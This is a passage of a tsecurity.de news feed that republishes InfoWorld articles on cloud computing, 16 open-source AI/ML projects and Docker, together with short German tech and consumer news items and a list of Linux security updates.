<li>Overreliance on a single cloud provider can limit flexibility and increase costs. Repatriation allows organizations to diversify their infrastructure and reduce vendor dependency.  </li>



<li>Industries with stringent compliance requirements may find it easier to meet standards with on-premises infrastructure.  </li>



<li>On-premises environments offer greater control over hardware, software, and network configurations, allowing for customized solutions.  </li>
</ul>



<h2 class="wp-block-heading"><strong>Benefits of cloud computing</strong></h2>



<p class="wp-block-paragraph">The cloud’s main appeal is to reduce the time to market of applications that need to scale dynamically. Increasingly, however, developers are drawn to the cloud by the abundance of advanced new services that can be incorporated into applications, from machine learning to internet of things (IoT) connectivity.</p>



<p class="wp-block-paragraph">Although businesses sometimes migrate legacy applications to the cloud to reduce data center resource requirements, the real benefits accrue to new applications that take advantage of cloud services and “cloud native” attributes. The latter include <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices architecture</a>, <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Linux containers</a> to enhance application portability, and container management solutions such as <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a> that orchestrate container-based services. <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html">Cloud-native</a> approaches and solutions can be part of either public or private clouds and help enable highly efficient <a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">devops</a> workflows.</p>



<p class="wp-block-paragraph">Cloud computing, be it public or private or hybrid or multicloud, has become the platform of choice for large applications, particularly customer-facing ones that need to change frequently or scale dynamically. More significantly, the major public clouds now lead the way in enterprise technology development, debuting new advances before they appear anywhere else. Workload by workload, enterprises are opting for the cloud, where an endless parade of exciting new technologies invite innovative use.</p>



<p class="wp-block-paragraph">SaaS has its roots in the ASP (application service provider) trend of the early 2000s, when providers would run applications for business customers in the provider’s data center, with dedicated instances for each customer. The ASP model was a spectacular failure because it quickly became impossible for providers to maintain so many separate instances, particularly as customers demanded customizations and updates.</p>



<p class="wp-block-paragraph">Salesforce is widely considered the first company to launch a highly successful SaaS application using <a href="https://www.infoworld.com/article/2335534/the-evolution-of-multitenancy-for-cloud-computing.html">multitenancy</a> — a defining characteristic of the SaaS model. Rather than each Salesforce customer getting its own application instance, customers who subscribe to the company’s salesforce automation software share a single, large, dynamically scaled instance of an application (like tenants sharing an apartment building), while storing their data in separate, secure repositories on the SaaS provider’s servers. Fixes can be rolled out behind the scenes with zero downtime and customers can receive UX or functionality improvements as they become available.</p>



<p class="wp-block-paragraph"></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[16 open source projects transforming AI and machine learning]]></title>
<description><![CDATA[For several decades now, the most innovative software has always emerged from the world of open source software. It’s no different with machine learning and large language models. If anything, the open source ecosystem has grown richer and more complex, because now there are open source models to...]]></description>
<link>https://tsecurity.de/de/3665665/ai-nachrichten/16-open-source-projects-transforming-ai-and-machine-learning/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665665/ai-nachrichten/16-open-source-projects-transforming-ai-and-machine-learning/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:27 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For several decades now, the most innovative software has always emerged from the world of open source software. It’s no different with machine learning and <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html">large language models</a>. If anything, the open source ecosystem has grown richer and more complex, because now there are open source models to complement the open source code.</p>



<p class="wp-block-paragraph">For this article, we’ve pulled together some of the most intriguing and useful projects for <a href="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html">AI and machine learning</a>. Many of these are foundation projects, nurturing their own niche ecology of open source plugins and extensions. Once you’ve started with the basic project, you can keep adding more parts.</p>



<p class="wp-block-paragraph">Most of these projects offer demonstration code, so you can start up a running version that already tackles a basic task. Additionally, the companies that build and maintain these projects often sell a service alongside them. In some cases, they’ll deploy the code for you and save you the hassle of keeping it running. In others, they’ll sell custom add-ons and modifications. The code itself is still open, so there’s no vendor lock in. The services simply make it easier to adopt the code by paying someone to help.</p>



<p class="wp-block-paragraph">Here are 16 open source projects that developers can use to unlock the potential in machine learning and large language models of any size—from small to large, and even extra large.</p>



<h2 class="wp-block-heading">Agent Skills</h2>



<p class="wp-block-paragraph">AI coding agents are often used to tackle standard tasks like <a href="https://www.infoworld.com/article/3981588/putting-agentic-ai-to-work-in-firebase-studio.html">writing React components</a> or <a href="https://www.infoworld.com/article/4025088/how-coderabbit-brings-ai-to-code-reviews.html">reviewing parts of the user interface</a>. If you are writing a coding agent, it makes sense to use vetted solutions that are focused on the task at hand. <a href="https://github.com/vercel-labs/agent-skills">Agent Skills</a> are pre-coded tools that your AI can deploy as needed. The result is a focused set of vetted operations capable of producing refined, useful code that stays within standard guidelines. License: MIT.</p>



<h2 class="wp-block-heading">Awesome LLM Apps</h2>



<p class="wp-block-paragraph">If you are looking for good examples of agentic coding, see the <a href="https://github.com/Shubhamsaboo/awesome-llm-apps">Awesome LLM Apps collection</a>. Currently, the project hosts several dozen applications that leverage some combination of <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">RAG databases</a> and LLMs. Some are simple, like a meme generator, while others handle deeper research like the Journalist agent. The most complex examples deploy multi-agent teams to converge upon an answer. Every application comes with working examples for experimentation, so you can learn from what’s been successful in the past. Altogether, the apps in this collection are great inspiration for your own projects. License: Apache 2.0.</p>



<h2 class="wp-block-heading">Bifrost</h2>



<p class="wp-block-paragraph">If your application requires access to an LLM service, and you don’t have a particular one in mind, check out <a href="https://github.com/maximhq/bifrost">Bifrost</a>. A fast, unified gateway to more than 15 LLM providers, this OpenAI-compatible API quickly abstracts away the differences between models, including all the major ones. It includes essential features like governance, caching, budget management, load balancing, and it has guardrails to catch problems before they are sent out to service providers, who will just bill you for the time. With dozens of great LLM providers constantly announcing new and better models, why limit yourself? License: Apache 2.0.</p>



<h2 class="wp-block-heading">Claude Code</h2>



<p class="wp-block-paragraph">If the popularity of AI coding assistants tells us anything, it’s that all developers—and not just the ones building AI apps—appreciate a little help writing and reviewing their code. <a href="https://github.com/anthropics/claude-code">Claude Code</a> is that pair programmer. Trained on all the major programming languages, <a href="https://www.infoworld.com/article/3853805/vibe-coding-with-claude-code.html">Claude Code can help you write code that is better, faster, and cleaner</a>. It digests a codebase and then starts doing your bidding, while also making useful suggestions. Natural language commands plus some vague hand waving are all the Anthropic LLM needs to refactor, document, or even add new features to your existing code. License: Anthropic’s Commercial TOS.</p>



<h2 class="wp-block-heading">Clawdbot</h2>



<p class="wp-block-paragraph">Many of the tools in this list help developers create code for other people. <a href="https://github.com/clawdbot/clawdbot?tab=readme-ov-file">Clawdbot</a> is the AI assistant for you, the person writing the code. It integrates with your desktop to control built-in tools like the camera and large applications like the browser. A multi-channel inbox accepts your commands through more than a dozen different communication channels including WhatsApp, Telegram, Slack, and Discord. A cron job adds timing. It’s the ultimate assistant for you, the ruler of your data. If AI exists to make our lives easier, why not start by organizing the applications on your desktop? License: MIT.</p>



<h2 class="wp-block-heading">Dify</h2>



<p class="wp-block-paragraph">For projects that require more than just one call to an LLM, <a href="https://github.com/langgenius/dify">Dify</a> could be the solution you’ve been looking for. Essentially a development environment for building complex agentic workflows, Dify stitches together LLMs, RAG databases, and other sources. It then monitors how they perform under different prompts and parameters and puts it all together in a handy dashboard, so you can iterate on the results. Developing agentic AI requires rapid experimentation, and Dify provides the environment for those experiments. License: Modified version of Apache 2.0 to exclude some commercial uses.</p>



<h2 class="wp-block-heading">Eigent</h2>



<p class="wp-block-paragraph">The best way to explore the power and limitations of an agentic workflow is to deploy it yourself on your own machine, where it can solve your own problems. Eigent delivers a workforce of specialized agents for handling tasks like writing code, searching the web, and creating documents. You just wave your hands and issue instructions, and Eigent’s LLMs do their best to follow through. Many startups brag about eating their own dogfood. Eigent puts that concept on a platter, making it easy for AI developers to experience directly the abilities and failings of the LLMs they’re building. License: Apache 2.0.</p>



<h2 class="wp-block-heading">Headroom</h2>



<p class="wp-block-paragraph">Programmers often think like packrats. If the data is good, why not pack in some more? This is a challenge for code that uses an LLM because these services charge by the token, and they also have a limited context window. <a href="https://github.com/chopratejas/headroom">Headroom</a> tackles this issue with agile compression algorithms that trim away the excess, especially the extra labels and punctuation found in common formats like JSON. A big part of designing working AI applications is cost engineering, and saving tokens means saving money. License: Apache 2.0.</p>



<h2 class="wp-block-heading">Hugging Face Transformers</h2>



<p class="wp-block-paragraph">When it comes to starting up a brand-new machine learning project, <a href="https://github.com/huggingface/transformers">Hugging Face Transformers</a> is one of the best foundations available. Transformers offers a standard format for defining how the model interacts with the world, which makes it easy to drop a new model into your working infrastructure for training or deployment. This means your model will interact nicely with all the already available tools and infrastructure, whether for text, vision, audio, video, or all of the above. Fitting into a standard paradigm makes it much easier to leverage your existing tools while focusing on the cutting edge of your research. License: Apache 2.0.</p>



<h2 class="wp-block-heading">LangChain</h2>



<p class="wp-block-paragraph">For agentic AI solutions that require endless iteration, <a href="https://github.com/langchain-ai/langchain">LangChain</a> is a way to organize the effort. It harnesses the work of a large collection of models and makes it easier for humans to inspect and curate the answers. When the task requires deeper thinking and planning, LangChain makes it easy to work with agents that can leverage multiple models to converge upon a solution. LangChain’s architecture includes a framework (LangGraph) for organizing easily customizable workflows with long-term memory, and a tool (LangSmith) for evaluating and improving performance. Its Deep Agents library provides teams of sub-agents, which organize problems into subsets then plan and work toward solutions. It is a proven, flexible test bed for agentic experimentation and production deployment. License: MIT.</p>



<h2 class="wp-block-heading">LlamaIndex</h2>



<p class="wp-block-paragraph">Many of the early applications for LLMs are sorting through large collections of semi-structured data and providing users with useful answers to their questions. One of the fastest ways to customize a standard LLM with private data is to use <a href="https://github.com/run-llama/llama_index">LlamaIndex</a> to ingest and index the data. This off-the-shelf tool provides data connectors that you can use to unpack and organize a large collection of documents, tables, and other data, often with just a few lines of code. The layers underneath can be tweaked or extended as the job requires, and LlamaIndex works with many of the data formats common in enterprises. License: MIT.</p>



<h2 class="wp-block-heading">Ollama</h2>



<p class="wp-block-paragraph">For anyone experimenting with LLMs on their laptop, <a href="https://github.com/ollama/ollama">Ollama</a> is one of the simplest ways to <a href="https://www.infoworld.com/article/2338922/5-easy-ways-to-run-an-llm-locally.html" data-type="link" data-id="https://www.infoworld.com/article/2338922/5-easy-ways-to-run-an-llm-locally.html">download one or more of them and get started</a>. Once it’s installed, your command line becomes a small version of the classic ChatGPT interface, but with the ability to pull a huge collection of models from a growing library of open source options. Just enter: <code>ollama run </code> and the model is ready to go. Some developers are using it as a back-end server for LLM results. The tool provides a stable, trustworthy interface to LLMs, something that once required quite a bit of engineering and fussing. The server simplifies all this work so you can tackle higher level chores with many of the <a href="https://ollama.com/library">most popular open source LLMs</a> at your fingertips. License: MIT.</p>



<h2 class="wp-block-heading">OpenWebUI</h2>



<p class="wp-block-paragraph">One of the fastest ways to put up a website with a chat interface and a dedicated RAG database is to spin up an instance of <a href="https://github.com/open-webui/open-webui">OpenWebUI</a>. This project knits together a feature-rich front end with an open back end, so that starting up a customizable chat interface only requires pulling a few <a href="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html">Docker containers</a>. The project, though, is just a beginning, because it offers the opportunity to add plugins and extensions to enhance the data at each stage. Practically every part of the chain from prompt to answer can be tweaked, replaced, or improved. While some teams might be happy to set it up and be done, the advantages come from adding your own code. The project isn’t just open source itself, but a constellation of hundreds of little bits of contributed code and ancillary projects that can be very helpful. Being able to customize the pipeline and leverage the <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP protocol</a> supports the delivery of precision solutions. License: Modified BSD designed to restrict removing OpenWebUI branding without an enterprise license.</p>



<h2 class="wp-block-heading">Sim</h2>



<p class="wp-block-paragraph">The drag-and-drop canvas for <a href="https://github.com/simstudioai/sim">Sim</a> is meant to make it easier to experiment with <a href="https://www.infoworld.com/article/4086884/how-to-automate-the-testing-of-ai-agents.html">agentic workflows</a>. The tool handles the details of interacting with the various LLMs and vector databases; you just decide how to fit them together. Interfaces like Sim make the agentic experience accessible to everyone on your team, even those who don’t know how to write code. License: Apache 2.0.</p>



<h2 class="wp-block-heading">Sloth</h2>



<p class="wp-block-paragraph">One of the most straightforward ways to leverage the power of foundational LLMs is to start with an open source model and fine-tune it with your own data. <a href="https://github.com/unslothai/unsloth">Unsloth</a> does this, often faster than other solutions do. Most major open source models can be transformed with reinforcement learning. Unsloth is designed to work with most of the standard precisions and some of the largest context windows. The best answers won’t always come directly from RAG databases. Sometimes, adjusting the models is the best solution. License: Apache 2.0.</p>



<h2 class="wp-block-heading">vLLM</h2>



<p class="wp-block-paragraph">One of the best ways to turn an LLM into a useful service for the rest of your code is to start it up with <a href="https://github.com/vllm-project/vllm">vLLM</a>. The tool loads many of the available open source models from repositories like Hugging Face and then orchestrates the data flows so they keep running. That means batching the incoming prompts and managing the pipelines so the model will be a continual source of fast answers. It supports not just the CUDA architecture but also AMD CPUs and GPUs, Intel CPUs and GPUs, PowerPC CPUs, Arm CPUs, and TPUs. It’s one thing to experiment with lots of models on a laptop. It’s something else entirely to deploy the model in a production environment. vLLM handles many of the endless chores that deliver better performance. License: Apache-2.0.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is Docker? The spark for the container revolution]]></title>
<description><![CDATA[Docker is a software platform for building applications based on containers—small and lightweight execution environments that make shared use of the operating system kernel but otherwise run in isolation from one another. While containers have been used in Linux and Unix systems for some time, Do...]]></description>
<link>https://tsecurity.de/de/3665663/ai-nachrichten/what-is-docker-the-spark-for-the-container-revolution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665663/ai-nachrichten/what-is-docker-the-spark-for-the-container-revolution/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:23 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Docker is a software platform for building applications based on <a href="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html">containers</a>—small and lightweight execution environments that make shared use of the operating system kernel but otherwise run in isolation from one another. While containers have been used in Linux and Unix systems for some time, Docker, an open source project launched in 2013, helped popularize the technology by making it easier than ever for developers to package their software to “build once and run anywhere.”</p>



<h2 class="wp-block-heading">A brief history of Docker</h2>



<p class="wp-block-paragraph">Founded as DotCloud in 2008 by Solomon Hykes in Paris, what we now know as Docker started out as a <a href="https://www.infoworld.com/article/2256066/what-is-paas-platform-as-a-service-a-simpler-way-to-build-software-applications.html">platform as a service (PaaS)</a> before <a href="https://www.docker.com/blog/dotcloud-is-becoming-docker-inc/">pivoting in 2013</a> to focus on democratizing the underlying software containers its platform was running on.</p>



<p class="wp-block-paragraph"><a href="https://www.youtube.com/watch?v=362sHaO5eGU">Hykes first demoed Docker</a> at PyCon in March 2013, explaining that Docker was created because developers kept asking for the underlying technology powering the DotCloud platform. “We did always think it would be cool to be able to say, ‘Yes, here is our low-level piece. Now you can do Linux containers with us and go do whatever you want, go build your platform.’ So that’s what we are doing.”</p>



<p class="wp-block-paragraph">And so, Docker was born, with the open source project quickly picking up traction with developers and attracting the attention of high-profile technology providers like Microsoft, IBM, and Red Hat, as well as venture capitalists willing to pump millions of dollars into the innovative startup. The container revolution had begun.</p>



<h2 class="wp-block-heading">What are containers?</h2>



<p class="wp-block-paragraph">As Hykes described it in his PyCon talk, containers are “self-contained units of software you can deliver from a server over there to a server over there, from your laptop to EC2 to a bare-metal giant server, and it will run in the same way because it is isolated at the process level and has its own file system.”</p>



<p class="wp-block-paragraph">The components for doing this have long existed in operating systems like Linux. By simplifying their use and giving these bits a common interface, Docker quickly became close to a de facto industry standard for containers. Docker let developers deploy, replicate, move, and back up a workload in a single, streamlined way, using a set of reusable images to make workloads more portable and flexible than previously possible.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html">Why you should use Docker and OCI containers</a>.</strong></p>



<p class="wp-block-paragraph">In the virtual machine (VM) world, something similar could be achieved by keeping applications separate while running on the same hardware. But each VM requires its own operating system, meaning VMs are typically large, slow to start up, difficult to move around, and cumbersome to maintain and upgrade.</p>



<p class="wp-block-paragraph">Containers represent a defined shift from the VM era, in that they isolate execution environments while sharing the underlying OS kernel. As a result, they are speedier and far more lightweight than VMs.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image large"><a class="zoom" href="https://legacy-us-images.foundryco.app/images/article/2017/06/virtualmachines-vs-containers-100727624-orig.jpg" rel="nofollow"><img width="400px" loading="lazy" src="https://legacy-us-images.foundryco.app/images/article/2017/06/virtualmachines-vs-containers-100727624-large.jpg" alt="virtualmachines vs containers"></a><figcaption class="wp-element-caption">
<p>Stacking up the virtualization and container infrastructure stacks.</p>
</figcaption></figure></div>



<h2 class="wp-block-heading">Docker: The component parts</h2>



<p class="wp-block-paragraph">Docker took off with software developers as a novel way to package the tools required to build and launch a container. It was more streamlined and simplified than anything previously possible. Broken down into its component parts, Docker consists of the following:</p>



<ul class="wp-block-list">
<li><strong>Dockerfile</strong>: Each Docker container starts with a Dockerfile. This text file provides a set of instructions to build a Docker image, including the operating system, languages, environmental variables, file locations, network ports, and any other components it needs to run. Provide someone with a Dockerfile and they can recreate the Docker image wherever they please, although the build process takes time and system resources.</li>



<li><strong>Docker image</strong>: Like a snapshot in the VM world, a Docker image is a portable, read-only executable file. It contains the instructions for creating a container and the specifications for which software components to run and how the container will run them. Docker images are far larger than Dockerfiles but require no build step: They can boot and run as-is.</li>



<li><strong>Docker run utility</strong>: Docker’s run utility is the command that launches a container. Each container is an instance of an image, and multiple instances of the same image can be run simultaneously.</li>



<li><strong>Docker Hub</strong>: Docker Hub is a repository where container images can be stored, shared, and managed. Think of it as Docker’s own version of GitHub, but specifically for containers.</li>



<li><strong>Docker Engine</strong>: Docker Engine is the core of Docker. It is the underlying client-server technology that creates and runs the containers. The Docker Engine includes a long-running daemon process called dockerd for managing containers, APIs that allow programs to communicate with the Docker daemon, and a command-line interface.</li>



<li><strong>Docker Compose</strong>: Docker Compose is a command-line tool that uses YAML files to define and run multicontainer Docker applications. It allows you to create, start, stop, and rebuild all the services from your configuration and view the status and log output of all running services.</li>



<li><strong>Docker Desktop</strong>: All of these component parts are wrapped in Docker’s Desktop application, providing a user-friendly way to build and share containerized applications and <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices</a>.</li>
</ul>



<h2 class="wp-block-heading">Advantages of Docker</h2>



<p class="wp-block-paragraph">Docker containers provide a way to build applications that are easier to assemble, maintain, and move around than previous methods allowed. That provides several advantages to software developers:</p>



<ul class="wp-block-list">
<li><strong>Docker containers are minimalistic and enable portability</strong>: Docker helps to keep applications and their environments clean and minimal by isolating them, which allows for more granular control and greater portability.</li>



<li><strong>Docker containers enable composability</strong>: Containers make it easier for developers to compose the building blocks of an application into a modular unit with easily interchangeable parts, which can speed up development cycles, feature releases, and bug fixes.</li>



<li><strong>Docker containers make orchestration and scaling easier</strong>: Because containers are lightweight, developers can launch many of them for better scaling of services, and each container instance launches many times faster than a VM. These clusters of containers do then need to be orchestrated, which is where a platform like <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a> typically comes in.</li>
</ul>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3529526/how-to-succeed-with-kubernetes.html">How to succeed with Kubernetes</a>.</strong></p>



<h2 class="wp-block-heading">Drawbacks of Docker</h2>



<p class="wp-block-paragraph">Containers solve a great many problems, but they don’t solve them all. Common complaints about Docker include the following:</p>



<ul class="wp-block-list">
<li><strong>Docker containers are not virtual machines</strong>: Unlike virtual machines, containers use controlled portions of the host operating system’s resources, which means elements aren’t as strictly isolated as they would be on a VM.</li>



<li><strong>Docker containers don’t provide bare-metal speed</strong>: Containers are significantly more lightweight and closer to the metal than virtual machines, but they do incur some performance overhead. If your workload requires bare-metal speed, a container will get you close but not all the way there.</li>



<li><strong>Docker containers are stateless and immutable</strong>: Containers boot and run from an image that describes their contents. That image is immutable by default—once created, it doesn’t change. But a container <em>instance</em> is transient. Once removed from system memory, it’s gone forever. If you want your containers to persist state across sessions, like a virtual machine, you need to design for that persistence.</li>
</ul>



<h2 class="wp-block-heading">Docker today</h2>



<p class="wp-block-paragraph">Container usage has continued to grow in tandem with <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html">cloud-native development</a>, now the dominant model for building and running software. But these days, Docker is only a part of that puzzle.</p>



<p class="wp-block-paragraph">Docker grew popular because it made it easy to move the code for an application and its dependencies from the developer’s laptop to a server. But the rise of containers led to a shift in the way applications were built—from monolithic stacks to <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">networks of microservices</a>. Soon, many users needed a way to orchestrate and manage groups of containers at scale.</p>



<p class="wp-block-paragraph">Launched at Google, the <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a> open source project quickly emerged as the best way to orchestrate containers, superseding Docker’s own attempts to solve this problem with <a href="https://boxboat.com/2019/12/10/migrate-docker-swarm-to-kubernetes/">Docker Swarm (RIP)</a>. Amidst increasing funding trouble, Docker eventually sold its enterprise business to Mirantis in 2019, which has since absorbed Docker Enterprise into the Mirantis Kubernetes Engine.</p>



<p class="wp-block-paragraph">The remains of Docker—which includes the original open source Docker Engine container runtime, Docker Hub image repository, and Docker Desktop application—live on under the leadership of company veteran Scott Johnston, who is looking to reorient the business around its core customer base of software developers.</p>



<p class="wp-block-paragraph">The Docker Business subscription service, and the revised Docker Desktop product, both reflect those new goals: Docker Business offers tools for managing and rapidly deploying secure Docker instances, and Docker Desktop requires paid usage for organizations with more than $10 million in annual revenue and 250 or more employees. But there’s also the Docker Personal subscription tier, for individuals and companies that fall below those thresholds, so end users still have access to many of Docker’s offerings.</p>



<p class="wp-block-paragraph">Docker has other offerings suited to the changing times. <a href="https://docs.docker.com/dhi/">Docker Hardened Images</a>, available in both free and enterprise tiers, provide application images with smaller attack surfaces and checked software components for better security. And, in step with the <a href="https://www.infoworld.com/artificial-intelligence/">AI revolution</a>, the <a href="https://docs.docker.com/ai/mcp-catalog-and-toolkit/">Docker MCP Catalog and Toolkit</a> provide Dockerized versions of tools that give AI applications broader functionality (such as by allowing access to the file system), making it easier to deploy AI apps with less risk to the surrounding environment.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[WM 2026: Frankreich gegen Spanien kostenlos live im TV und Stream?]]></title>
<description><![CDATA[Weltmeisterschaft 2026, und das erste Halbfinale elektrisiert die Fans: Gibt es Frankreich gegen Spanien gratis live im TV und Stream?]]></description>
<link>https://tsecurity.de/de/3665525/it-nachrichten/wm-2026-frankreich-gegen-spanien-kostenlos-live-im-tv-und-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665525/it-nachrichten/wm-2026-frankreich-gegen-spanien-kostenlos-live-im-tv-und-stream/</guid>
<pubDate>Mon, 13 Jul 2026 16:17:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Weltmeisterschaft 2026, und das erste Halbfinale elektrisiert die Fans: Gibt es Frankreich gegen Spanien gratis live im TV und Stream?]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (chromium, libxfont, mesa, opam, and wireless-regdb), Fedora (acl, attr, chromium, cjson, composer, docker-compose, jfrog-cli, librabbitmq, libssh2, libXfont2, log4cxx, OpenImageIO, openssh, p11-kit, perl-Crypt-DSA, perl-HTML-Gumbo, prometheus, python-d...]]></description>
<link>https://tsecurity.de/de/3665263/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665263/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 13 Jul 2026 14:41:08 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (chromium, libxfont, mesa, opam, and wireless-regdb), <b>Fedora</b> (acl, attr, chromium, cjson, composer, docker-compose, jfrog-cli, librabbitmq, libssh2, libXfont2, log4cxx, OpenImageIO, openssh, p11-kit, perl-Crypt-DSA, perl-HTML-Gumbo, prometheus, python-dulwich, python-idna, python-pillow, python-tornado, sssd, tmux, upower, webkitgtk, xorg-x11-server, and xorg-x11-server-Xwayland), <b>Mageia</b> (libarchive and vim), <b>Oracle</b> (389-ds:1.4, buildah, cups, edk2, freerdp, golang, grafana, gstreamer1-plugins-bad-free, gstreamer1-plugins-good, gstreamer1-plugins-ugly-free, kernel, libexif, libsolv, libtasn1, libxml2, nginx:1.24, nginx:1.26, nodejs:22, nodejs:24, oci-seccomp-bpf-hook, podman, postgresql:18, python-urllib3, tigervnc, tomcat, unbound, and xorg-x11-server), <b>Slackware</b> (p11-kit), and <b>SUSE</b> (agama, dash, dracut, flannel, go1.26, gsasl, gstreamer-plugins-good, ImageMagick, imagemagick, kernel, krb5, krb5, krb5-mini, libIex-3_4-33, libmbedtls23, libxfont2, nasm, nghttp2, perl-CGI-Session, perl-dbi, perl-List-SomeUtils-XS, python-pillow, python-social-auth-app-django, python-urllib3, python313-Django4, python313-Django6, python313-pytest-html, python313-sqlparse, python313-websockets, rclone, rust-keylime, rustup, sccache, spectre-meltdown-checker, sssd, terraform-provider-aws, terraform-provider-azurerm, terraform-provider-external, terraform-provider-google, terraform-provider-helm, terraform-provider-kubernetes, terraform-provid, thunderbird, tiff, traefik2, xorg-x11-server, and xwayland).]]></content:encoded>
</item>
<item>
<title><![CDATA[Gute Neuigkeiten für Horrorfilm-Fans: Die 15 Bonus-Minuten von Backrooms kann man bald kostenlos sehen]]></title>
<description><![CDATA[Kane Parsons Horrorfilm Backrooms brach einen Rekord nach dem anderen. Jetzt kündigt der YouTuber an: Die 15 Bonus-Minuten kann man bald kostenlos sehen.]]></description>
<link>https://tsecurity.de/de/3665075/it-nachrichten/gute-neuigkeiten-fuer-horrorfilm-fans-die-15-bonus-minuten-von-backrooms-kann-man-bald-kostenlos-sehen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665075/it-nachrichten/gute-neuigkeiten-fuer-horrorfilm-fans-die-15-bonus-minuten-von-backrooms-kann-man-bald-kostenlos-sehen/</guid>
<pubDate>Mon, 13 Jul 2026 13:32:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kane Parsons Horrorfilm Backrooms brach einen Rekord nach dem anderen. Jetzt kündigt der YouTuber an: Die 15 Bonus-Minuten kann man bald kostenlos sehen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Fitness+: „Zeit fürs Gehen“ mit Thomas Müller ab sofort erhältlich (kostenlos für alle)]]></title>
<description><![CDATA[Apple Fitness+ hat vor ein paar Jahren die „Zeit fürs Gehen“-Reihe aufgelegt, die euch mit inspirierenden Geschichten dazu animieren möchte, öfter spazieren zu gehen. Ab sofort steht eine neue Folge von „Zeit fürs Gehen“ bereit, dieses Mal mit dem MLS-Spieler Thomas Müller der Vancouver Whitecaps...]]></description>
<link>https://tsecurity.de/de/3664836/ios-mac-os/apple-fitness-zeit-fuers-gehen-mit-thomas-mueller-ab-sofort-erhaeltlich-kostenlos-fuer-alle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664836/ios-mac-os/apple-fitness-zeit-fuers-gehen-mit-thomas-mueller-ab-sofort-erhaeltlich-kostenlos-fuer-alle/</guid>
<pubDate>Mon, 13 Jul 2026 11:55:24 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple Fitness+ hat vor ein paar Jahren die „Zeit fürs Gehen“-Reihe aufgelegt, die euch mit inspirierenden Geschichten dazu animieren möchte, öfter spazieren zu gehen. Ab sofort steht eine neue Folge von „Zeit fürs Gehen“ bereit, dieses Mal mit dem MLS-Spieler Thomas Müller der Vancouver Whitecaps FC. Besonders erfreulich ist, dass ihr kein Apple Fitness+ Abonnement […]]]></content:encoded>
</item>
<item>
<title><![CDATA[3,52 % bei Autobank: Stellantis bietet Top-Zins beim Tagesgeld]]></title>
<description><![CDATA[Die Stellantis Direktbank bietet Neukunden beim Tagesgeld ab sofort einen starken Aktionszins. Wer sein Geld flexibel parken will, erhält eine monatliche Zinsgutschrift, die Kontoführung ist kostenlos.]]></description>
<link>https://tsecurity.de/de/3664780/it-nachrichten/352-bei-autobank-stellantis-bietet-top-zins-beim-tagesgeld/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664780/it-nachrichten/352-bei-autobank-stellantis-bietet-top-zins-beim-tagesgeld/</guid>
<pubDate>Mon, 13 Jul 2026 11:32:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
